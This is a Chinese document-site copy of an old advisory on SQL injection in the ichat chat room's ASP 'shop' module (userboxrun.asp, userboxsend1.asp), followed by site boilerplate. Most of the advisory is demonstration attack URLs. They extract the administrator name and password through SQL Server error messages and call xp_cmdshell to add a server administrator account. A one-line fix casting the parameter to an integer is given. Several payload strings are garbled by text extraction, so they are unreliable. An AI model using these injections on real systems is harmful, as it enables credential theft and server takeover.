ichat聊天室asp模块存在sql注入漏洞和演示--

ichat聊天室asp模块存在sql注入漏洞和演示--

ID:24386265

大小:52.00 KB

页数:3页

时间:2018-11-14

ichat聊天室asp模块存在sql注入漏洞和演示--_第1页
ichat聊天室asp模块存在sql注入漏洞和演示--_第2页
ichat聊天室asp模块存在sql注入漏洞和演示--_第3页
资源描述:

《ichat聊天室asp模块存在sql注入漏洞和演示--》由会员上传分享,免费在线阅读,更多相关内容在工程资料-天天文库

1、ichat聊天室asp模块存在SQL注入漏洞和演示>>ichat聊天室asp模块存在SQL注入漏洞和演示涉及版本ichat1.81ichat1.85ichat1.86ichat聊天室是国内比较著名的聊天服务器软件,其中的百宝箱里面的userboxrun.asp,userboxsend1.asp等文件存在sql注入漏洞,用户提交:xx.xx.xx.xx/shop/userboxrun.asp?efromadmin)xx.xx.xx.xx/shop/userboxrun.asp?admin)xx.xx.xx.xx/shop/userboxrun.a

2、sp?efromuserinfo)xx.xx.xx.xx/shop/userboxrun.asp?userinfo)等一系列url能得到聊天室管理员用户名称和密码。在没关闭详细错误显示的sql版服务器上提交:xx.xx.xx.xx/shop/userboxrun.asp?efromadmin)=5xx.xx.xx.xx/shop/userboxrun.asp?admin)=5类似url可以得到如下显示MicrosoftOLEDBProviderforSQLServer错误80040e07将varchar值admin转换为数据类型为int的列时发

3、生语法错误。/shop/userboxrun.asp,行27admin即为管理员名称MicrosoftOLEDBProviderforSQLServer错误80040e07将varchar值ichat转换为数据类型为int的列时发生语法错误。/shop/userboxrun.asp,行27ichat即为管理员密码,具体过程不再详述。最危险的是,在没删除xp_cmdshell储存过程的sql版服务器上,如果用于ichat连接数据库的sql用户是sa权限的,提交如下url:xx.xx.xx.xx/shop/userboxrun.asp?aster.

4、dbo.xp_cmdshell"userxiaoluxiaoxue/add";--xx.xx.xx.xx/shop/userboxrun.asp?aster.dbo.xp_cmdshell"localgroupadministratorsxiaolu/add";--可以添加用户名称为:xiaolu,密码为:xiaoxue的服务器管理员。解决办法:在wpid=request.querystring("wp")wpid=replace(wpid,"","")添加:wpid=cint(wpid)>>>>这篇文章来自..,。

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。